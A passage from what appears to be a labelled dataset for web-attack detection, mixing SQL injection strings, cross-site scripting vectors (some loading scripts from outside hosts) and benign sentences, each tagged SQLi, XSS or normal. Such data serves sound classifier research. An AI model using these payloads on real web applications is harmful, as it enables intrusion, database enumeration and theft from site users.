) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'ugoz' = 'ugoz,2,SQLi,10117 "<style>@keyframes x{}</style><button style=""animation-name:x"" onanimationstart=""alert(1)""></button>",1,XSS,1483 "<hr draggable=""true"" ondragleave=""alert(1)"">test</hr>",1,XSS,4875 "1"" or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ""ctdc"" = ""ctdc",2,SQLi,13111 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#",2,SQLi,16026 "<data onmousemove=""alert(1)"">test</data>",1,XSS,8041 "1 ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( 9474 = 9474",2,SQLi,12366 -4313%' ) or 6872 = 6872 and ( '%' = ',2,SQLi,19743 or 1 = 1--,2,SQLi,22434 "-8034"" or 8571 = 8571--",2,SQLi,21341 "Selecting table linens can be confusing because there are so many sizes and fabrics to choose between, but these tips can help you select the right linens for your table.",3,normal,25567 "<map oncopy=""alert(1)"" contenteditable>test</map>",1,XSS,5799 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( table_name ) FROM ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables ) WHERE LIMIT = 7 ) ) AND 'i' = 'i",2,SQLi,11509 "<th onbeforecut=""alert(1)"" contenteditable>test</th>",1,XSS,5234 1 ) ) and 4595 = 4595#,2,SQLi,21498 "<section onmouseout=""alert(1)"">test</section>",1,XSS,6648 "1' ) where 5071 = 5071 union all select null,null,null,null,null,null,null--",2,SQLi,15558 "-->'""/></sCript><svG x="">"" onload=(co\u006efirm)``>",1,XSS,5492 "<div draggable=""true"" contenteditable>drag me</div><progress ondragover=alert(1) contenteditable>drop here</progress>",1,XSS,770 "1%"" ) ) union all select null,null,null,null,null#",2,SQLi,18473 Where's the ice rink?,3,normal,23612 "<form><a href=""javascript:\u0061lert(1)"">X",1,XSS,7314 Select your signal.,3,normal,24903 "{""id"":null,""name"":""Poliwhirl""}",3,normal,27537 1 ) union all select null--,2,SQLi,20937 "<script ="">"" SRC=""http://www.securitycompass.com/xss.js""></script>",1,XSS,2719 <spacer id=x tabindex=1 onbeforedeactivate=alert(1)></spacer><input autofocus>,1,XSS,2081 There a number of different animals that you can select when looking for a small furry friend.,3,normal,25340 "<style onReadyStateChange style onReadyStateChange=""javascript:javascript:alert(1)""></style onReadyStateChange>",1,XSS,953 Select carefully.,3,normal,24484 <map id=x tabindex=1 ondeactivate=alert(1)></map><input id=y autofocus>,1,XSS,2484 "<li onmouseup=""alert(1)"">test</li>",1,XSS,9184 "<style type=""text/css"">BODY{background:url(""javascript:document.vulnerable=true"")}</style>",1,XSS,1761 -2783%' ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( '%' = ',2,SQLi,10008 1' ) waitfor delay '0:0:5'--,2,SQLi,20834 values,3,normal,23130 "=+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'",2,SQLi,9920 1 ) where 5442 = 5442,2,SQLi,21597 Select your swear.,3,normal,24959 -2797' ) ) ) union all select 5711#,2,SQLi,20109 "<hgroup onkeyup=""alert(1)"" contenteditable>test</hgroup>",1,XSS,4245 "select count ( * ) from generate_series ( 1,5000000 ) -- gqkk",2,SQLi,17096 "1%"" waitfor delay '0:0:5' and ""%"" = """,2,SQLi,19840 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( 'bhlx' like 'bhlx",2,SQLi,13419 "<blockquote onmouseenter=""alert(1)"">test</blockquote>",1,XSS,4946 "1' in boolean mode ) and elt ( 1210 = 1210,sleep ( 5 ) ) #",2,SQLi,17374 <iframe onfocusout=alert(1) id=x><input autofocus>,1,XSS,5590 "select * from users where id = 1 or \<$ union select 1,@@VERSION -- 1",2,SQLi,16265 "-2920"" ) ) as zdgv where 9702 = 9702 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10419 "-5161%"" or ( 1437 = 4869 ) *4869 and ""%"" = """,2,SQLi,19121 "<map onbeforecut=""alert(1)"" contenteditable>test</map>",1,XSS,4759 "<ruby onbeforecut=""alert(1)"" contenteditable>test</ruby>",1,XSS,4382 Create a memorable photograph.,3,normal,22746 "1 ) ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13496 """ or ""a""=""a",2,SQLi,22393 "-2643%"" union all select 7779,7779--",2,SQLi,19980 "1%' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and '%' = '",2,SQLi,13021 "`""'><img src=xxx:x \x0Conerror=javascript:alert(1)>",1,XSS,5301 <caption id=x tabindex=1 onbeforedeactivate=alert(1)></caption><input autofocus>,1,XSS,1992 "1 ) as keog where 8033 = 8033 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12336 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( ( 'xmwj' = 'xmwj",2,SQLi,12975 1'+ ( select wgmn where 4368 = 4368 and 7859 = 6151 ) +',2,SQLi,17613 1'|| ( select 'ldad' where 6146 = 6146 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) ) ||',2,SQLi,13514 "<rb onbeforecopy=""alert(1)"" contenteditable>test</rb>",1,XSS,4973 "{""id"":null,""firstName"":""Sharon"",""lastName"":""Khoo"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27253 select ( case when ( 6435 = 8988 ) then 6435 else 6435* ( select 6435 from information_schema.character_sets ) end ) #,2,SQLi,13250 ><img src=x onerror=javascript:alert(('A'))>,1,XSS,6786 <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>',1,XSS,3602 "She asked, ""Where is my missing sock?""",3,normal,22916 Select your grow.,3,normal,25035 "{""id"":null,""name"":""gentle""}",3,normal,27592 <button onDragEnter=javascript:alert(1)>,1,XSS,8073 "<hr onmouseenter=""alert(1)"">test</hr>",1,XSS,8580 "<time onmousemove=""alert(1)"">test</time>",1,XSS,7976 "1"" where 5517 = 5517 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10338 "<style>@keyframes x{}</style><menu style=""animation-name:x"" onanimationstart=""alert(1)""></menu>",1,XSS,1627 1' ) ) ) and ( 5995 = 9618 ) *9618 and ( ( ( 'nagr' like 'nagr,2,SQLi,16944 Very few voters will not select a more democratic system.,3,normal,25192 <link onpointerenter=alert(1)>XSS</link>,1,XSS,7973 "1 ) ) ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13248 "<SCRIPT a=`>` SRC=""http://ha.ckers.org/xss.js""></SCRIPT>",1,XSS,4214 "<tr oncut=""alert(1)"" contenteditable>test</tr>",1,XSS,6458 1'+ ( select 'dhcv' where 9372 = 9372,2,SQLi,19915 Select the music.,3,normal,24819 <img src=xss onerror=alert(1)>,1,XSS,9527 Where's the garden?,3,normal,23538 "1' ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( 'rqyz' = 'rqyz",2,SQLi,11718 "<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://hacker.com/xss.html"">",1,XSS,2710 1' ) where 2120 = 2120,2,SQLi,21446 <button onDataSetComplete=javascript:alert(1)>,1,XSS,6516 "><script alert(String.fromCharCode(88,83,83))</script>",1,XSS,4664 "-6656"" ) union all select 3931#",2,SQLi,20430 <figcaption id=x tabindex=1 onbeforedeactivate=alert(1)></figcaption><input autofocus>,1,XSS,1856 <fieldset id=x tabindex=1 onbeforeactivate=alert(1)></fieldset>,1,XSS,3074 "1 ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19280 @var select @var as var into temp end --,2,SQLi,19438 "Once you select which bank account will receive your money, select the amount you want transferred.",3,normal,25831 "1 where 4477 = 4477 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,14779 "<style>@keyframes x{}</style><main style=""animation-name:x"" onanimationend=""alert(1)""></main>",1,XSS,1647 "<div id=""127""><svg xmlns=""http://www.w3.org/2000/svg"" id=""x"">",1,XSS,3419 "<noscript onpaste=""alert(1)"" contenteditable>test</noscript>",1,XSS,3478 "{""id"":null,""name"":""strip""}",3,normal,27383 "1' ) as kbja where 4275 = 4275 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11077 "<style>@keyframes x{}</style><rp style=""animation-name:x"" onanimationend=""alert(1)""></rp>",1,XSS,1794 1'+ ( select goec where 9460 = 9460 rlike ( select ( case when ( 4740 = 1203 ) then 1 else 0x28 end ) ) ) +',2,SQLi,13742 "1%' ) ) ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15138 "<LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css"">",1,XSS,3799 "<noembed draggable=""true"" ondragend=""alert(1)"">test</noembed>",1,XSS,3370 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 1 ) ) AND 'i' = 'i",2,SQLi,11583 <shadow onpointerover=alert(1)>XSS</shadow>,1,XSS,7199 "{""id"":null,""name"":""Beelzemon BM""}",3,normal,27142 -3566%' or 2158 = 6289,2,SQLi,21524 admin' --,2,SQLi,22442 "1'|| ( select 'zbdv' where 1618 = 1618 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) ||'",2,SQLi,11665 "<th onmousemove=""alert(1)"">test</th>",1,XSS,8798 A look at select films screening at the Sundance Film Festival.,3,normal,26441 &lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;,1,XSS,128 "<frameset onmousedown=""alert(1)"">test</frameset>",1,XSS,5961 1' ) ) as yqek where 1957 = 1957,2,SQLi,20284 "1'+ ( select dyfw where 7743 = 7743 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) ) +'",2,SQLi,13659 "-9808' in boolean mode ) union all select 2528,2528,2528,2528,2528,2528,2528--",2,SQLi,15367 "<main onkeypress=""alert(1)"" contenteditable>test</main>",1,XSS,4453 "<header onmouseout=""alert(1)"">test</header>",1,XSS,7150 "and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,19939 "<style>:target {color: red;}</style><strike id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></strike>",1,XSS,829 Select a fragrance for the room.,3,normal,24216 "{""id"":null,""name"":""smaller""}",3,normal,27130 "-1408 ) ) union all select 5715,5715,5715,5715,5715,5715--",2,SQLi,17392 "1 ) as zhvx where 3171 = 3171 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,11497 "<base onmouseenter=""alert(1)"">test</base>",1,XSS,7786 -8519%' ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( '%' = ',2,SQLi,10404 "{""id"":null,""firstName"":""Jeff"",""lastName"":""Toh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27057 "<a href=""\x0Ajavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2445 Select your muse.,3,normal,24980 "1"" ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""bcxh"" like ""bcxh",2,SQLi,10565 "1 ) where 1443 = 1443 union all select null,null,null,null,null#",2,SQLi,16753 "<style>:target {color: red;}</style><legend id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></legend>",1,XSS,816 Modify the software settings.,3,normal,22592 "1%"" ) ) ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13023 "1 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11421 "Graduates of the most-select colleges often earn more than graduates of less-select public universities, who are employed at higher rates than those of community colleges, who get more calls from potential employers than graduates of online universities.",3,normal,26136 "{""id"":null,""name"":""Roggenrola""}",3,normal,27324 "( select 1 from generate_series ( 8515,8515,case when ( 8515 = 3477 ) then 1 else 0 end ) limit 1 )",2,SQLi,14177 "1' ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( 'dqjq' = 'dqjq",2,SQLi,12322 <menu id=x tabindex=1 onactivate=alert(1)></menu>,1,XSS,5781 "a=""get"";b=""URL(ja\"""";c=""vascr"";d=""ipt:ale"";e=""rt('XSS');\"")"";eval(a+b+c+d+e);",1,XSS,2118 "<iframe srcdoc=""&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"">",1,XSS,795 "-8353' ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'ptlz' = 'ptlz",2,SQLi,10171 <col id=x tabindex=1 onfocus=alert(1)></col>,1,XSS,6901 <a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus>,1,XSS,2676 "1'|| ( select 'xhqy' where 4531 = 4531 union all select null,null--",2,SQLi,16502 "-8783' ) ) union all select 4834,4834,4834,4834,4834,4834,4834,4834,4834--",2,SQLi,15794 "1"" ) as ranl where 5553 = 5553",2,SQLi,20635 "<blink draggable=""true"" ondragenter=""alert(1)"">test</blink>",1,XSS,3758 <blink onblur=alert(1) tabindex=1 id=x></blink><input autofocus>,1,XSS,2893 "-5066' ) ) union all select 9689,9689,9689,9689#",2,SQLi,18779 "1, ( select ( case when ( 8596 = 8596 ) then 1 else 8596* ( select 8596 from mysql.db ) end ) )",2,SQLi,14406 """)) or benchmark(10000000,MD5(1))#",2,SQLi,20127 <head onblur=alert(1) tabindex=1 id=x></head><input autofocus>,1,XSS,3230 "<font onmousemove=""alert(1)"">test</font>",1,XSS,7866 "<optgroup onmouseup=""alert(1)"">test</optgroup>",1,XSS,6361 "But the fibre produced by these rapid and economical means was very inferior in quality to the product of Maori handiwork, mainly because weak and undeveloped strands are, by machine preparation, unavoidably intermixed with the perfect fibres, which alone the Maoris select, and so the uniform quality and strength of the material are destroyed.",3,normal,26309 I'm thinking of where to go for a creative workshop.,3,normal,23752 or '1′='1,2,SQLi,22446 "1 ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13453 "1' ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'aovy' = 'aovy",2,SQLi,11128 select case when 7426 = 6635 then 1 else null end--,2,SQLi,18273 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( 'boud' = 'boud",2,SQLi,13970 <details id=x tabindex=1 onactivate=alert(1)></details>,1,XSS,4614 -9072 ) as saot where 2278 = 2278 order by 1#,2,SQLi,19053 "<script>Object.prototype.CLOSURE_BASE_PATH = 'data:,alert(1)//'; </script>",1,XSS,2245 "<ol onkeypress=""alert(1)"" contenteditable>test</ol>",1,XSS,5375 "<body onLoad body onLoad=""javascript:javascript:alert(1)""></body onLoad>",1,XSS,2338 "1 ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( 5030 = 5030",2,SQLi,17358 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--",2,SQLi,11284 "<style>:target {color:red;}</style><table id=x style=""transition:color 1s"" ontransitionend=alert(1)></table>",1,XSS,1122 "1' ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) )",2,SQLi,10813 "-4826 union all select 4532,4532,4532,4532,4532--",2,SQLi,18612 "<style>@keyframes slidein {}</style><sub style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></sub>",1,XSS,421 "<animation xlink:href=""data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E""/>",1,XSS,924 "<th onclick=""alert(1)"">test</th>",1,XSS,9449 You can move the joystick to the left to select the map display.,3,normal,25095 <track id=x tabindex=1 onactivate=alert(1)></track>,1,XSS,5410 <figcaption onpointerup=alert(1)>XSS</figcaption>,1,XSS,5790 ORDER BY 31337#,2,SQLi,22158 "1'|| ( select 'wyng' from dual where 2157 = 2157 union all select null,null--",2,SQLi,15398 Select a workout that suits your goals.,3,normal,24093 1 where 2956 = 2956,2,SQLi,21982 Select purchase.,3,normal,24561 if ( 8858 = 5680 ) select 8858 else drop function pyuo--,2,SQLi,17610 admin' or 1=1#,2,SQLi,22181 "<rt oncontextmenu=""alert(1)"">test</rt>",1,XSS,8392 "</script><img/*%00/src=""worksinchrome&colon;prompt(1)""/%00*/onerror='eval(src)'>",1,XSS,1972 "1"" ) ) as dcrk where 5164 = 5164 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11326 "<tfoot onkeypress=""alert(1)"" contenteditable>test</tfoot>",1,XSS,4020 "<meter draggable=""true"" ondragleave=""alert(1)"">test</meter>",1,XSS,3689 declare @q nvarchar (200) 0x730065006c00650063 ...,2,SQLi,18405 "1%"" ) ) waitfor delay '0:0:5'--",2,SQLi,20442 "1' ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( 'gmil' = 'gmil",2,SQLi,12814 "1 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,11270 "<div draggable=""true"" contenteditable>drag me</div><meta ondrop=alert(1) contenteditable>drop here</meta>",1,XSS,1250 <thead id=x tabindex=1 onbeforedeactivate=alert(1)></thead><input autofocus>,1,XSS,2194 "-4100' ) ) union all select 1163,1163,1163--",2,SQLi,19120 <rt onpointerout=alert(1)>XSS</rt>,1,XSS,9187 "-5934' union all select 6096,6096,6096,6096,6096#",2,SQLi,18598 <section id=x tabindex=1 onfocusin=alert(1)></section>,1,XSS,4672 "1"" ) where 3321 = 3321",2,SQLi,21557 "<details oncontextmenu=""alert(1)"">test</details>",1,XSS,5986 <hr id=x tabindex=1 onactivate=alert(1)></hr>,1,XSS,6568 "<BGSOUND SRC=""javascript:alert('XSS');"">",1,XSS,7807 "1'|| ( select 'fcnb' where 2869 = 2869 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ) ||'",2,SQLi,11978 "<keygen onmousemove=""alert(1)"">test</keygen>",1,XSS,6946 “><script>alert(“XSS”)</script>,1,XSS,9513 1' ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'hcpo' like 'hcpo,2,SQLi,10559 select * from users where id = 1.*1 or 1 = 1 -- 1,2,SQLi,18544 "1' and elt ( 1210 = 1210,sleep ( 5 ) ) and 'ioar' = 'ioar",2,SQLi,17473 "1"" ) ) ) rlike ( select ( case when ( 6915 = 4531 ) then 1 else 0x28 end ) ) and ( ( ( ""jzzu"" = ""jzzu",2,SQLi,14084 ; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --,2,SQLi,17008 "1"" ) as ufai where 9673 = 9673",2,SQLi,20637 \xE2\x81\x9Fjavascript:javascript:alert(1),1,XSS,7580 "<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;""></BODY></HTML>",1,XSS,79 She chose a recipe to try from the cookbook.,3,normal,23972 "-3952' ) union all select 6644,6644,6644--",2,SQLi,19306 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) ||'",2,SQLi,15548 1' waitfor delay '0:0:5',2,SQLi,21235 "Its sixth early-stage fund, True Ventures VI LP, closed with $350 million in committed capital, and its third Select Fund, True Ventures Select III, closed with $285 million in committed capital.",3,normal,25941 Specify filters where needed.,3,normal,23367 Insert the card.,3,normal,22839 Mr. Trump has yet to select nominees for the vacancies.,3,normal,25878 "<b onmouseleave=""alert(1)"">test</b>",1,XSS,9067 <svg><listing onload=alert(1)></listing>,1,XSS,8010 -6616 ) order by 1--,2,SQLi,21883 <menuitem onpointerenter=alert(1)>XSS</menuitem>,1,XSS,5953 "1"" and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ""tfok"" like ""tfok",2,SQLi,11181 "<button onbeforecopy=""alert(1)"" contenteditable>test</button>",1,XSS,3393 "<body oncopy=""alert(1)"" contenteditable>test</body>",1,XSS,5417 "-9008' ) union all select 4976,4976,4976,4976#",2,SQLi,18968 <main onpointerover=alert(1)>XSS</main>,1,XSS,8165 "1"" ) ) union all select null,null,null,null--",2,SQLi,19043 <textarea onselect=alert(1) autofocus>XSS</textarea>,1,XSS,5258 <figcaption id=x tabindex=1 onfocusin=alert(1)></figcaption>,1,XSS,3532 <bdo onpointerdown=alert(1)>XSS</bdo>,1,XSS,8570 "&lt;META HTTP-EQUIV=\""refresh\"" CONTENT=\""0;url=javascript&#058;alert('XSS');\""&gt;",1,XSS,1910 "Again, some wardrobe hods mentioned that they tried to select their dressers to fit the cast.",3,normal,26399 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><span id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></span>",1,XSS,237 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#",2,SQLi,12243 "-2568"" ) or ( 8459 = 8459 ) *4906 and ( ""exyw"" = ""exyw",2,SQLi,18012 "<title onmouseup=""alert(1)"">test</title>",1,XSS,7987 "<x style=""behavior:url(%(sct)s)"">",1,XSS,9313 <s onfocusout=alert(1) tabindex=1 id=x></s><input autofocus>,1,XSS,3492 "select * from generate_series ( 4465,4465,case when ( 4465 = 6232 ) then 1 else 0 end ) limit 1--",2,SQLi,14255 "1' in boolean mode ) and elt ( 9630 = 4765,4765 ) #",2,SQLi,18402 "-4093' ) ) union all select 5785,5785,5785#",2,SQLi,19232 "A vacancy among the fellows is filled up by the provost and a select number of the fellows, after examination comprised in five principal courses, mathematics, experimental science, classics, mental and moral science and Hebrew.",3,normal,26431 1' ) where 2511 = 2511 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,10592 "<div draggable=""true"" contenteditable>drag me</div><del ondrop=alert(1) contenteditable>drop here</del>",1,XSS,1344 <set onpointerleave=alert(1)>XSS</set>,1,XSS,8515 "<style>@keyframes x{}</style><video style=""animation-name:x"" onanimationend=""alert(1)""></video>",1,XSS,1621 <script>Object.prototype.documentMode = 9 </script>,1,XSS,5289 "1"" and ( 7597 = 8422 ) *8422 and ""gywp"" like ""gywp",2,SQLi,18468 "<w=""/x=""y>""/OndbLcLick=`<`[confir\u006d``]>z",1,XSS,7044 <param id=x tabindex=1 ondeactivate=alert(1)></param><input id=y autofocus>,1,XSS,2221 &#0060;,1,XSS,9868 AND 1=1--,2,SQLi,22458 "-4966%"" union all select 4300,4300,4300,4300,4300,4300,4300,4300#",2,SQLi,16668 "{""id"":null,""firstName"":""Caren"",""lastName"":""Lim"",""address"":""415 VALLEY VIEW DR, SCOTTSBLUFF NE 69361"",""city"":""3"",""telephone"":""1321490279""}",3,normal,26773 1' in boolean mode ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) #,2,SQLi,13001 Students intending to spend a year in Europe will be expected to select language electives.,3,normal,25521 "-5691' union all select 6610,6610#",2,SQLi,20152 AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i,2,SQLi,14618 "1"" ) waitfor delay '0:0:5' and ( ""hhzy"" like ""hhzy",2,SQLi,18434 "<footer onmouseover=""alert(1)"">test</footer>",1,XSS,6991 "1"" ) as ikdo where 4128 = 4128",2,SQLi,20644 "<div style=""list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));"">X",1,XSS,1919 &lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;,1,XSS,1830 "<template match=""/"">",1,XSS,9768 "1%"" ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ""%"" = """,2,SQLi,12631 "1%"" ) ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12965 "<menuitem ondblclick=""alert(1)"">test</menuitem>",1,XSS,6235 "Guys your start your league of four is a TEAMGAME and it starts during champ selection, even in SoloQueue.. … Talking about having hovered picks and teamcomps is not toxic, not uncalled for & not stupid, and you cant say ""let him play what he wants or dodge"" cuz thats stupid",3,normal,26498 "<;BGSOUND SRC="";javascript:alert(';XSS';);"";>;",1,XSS,6285 "<video><source 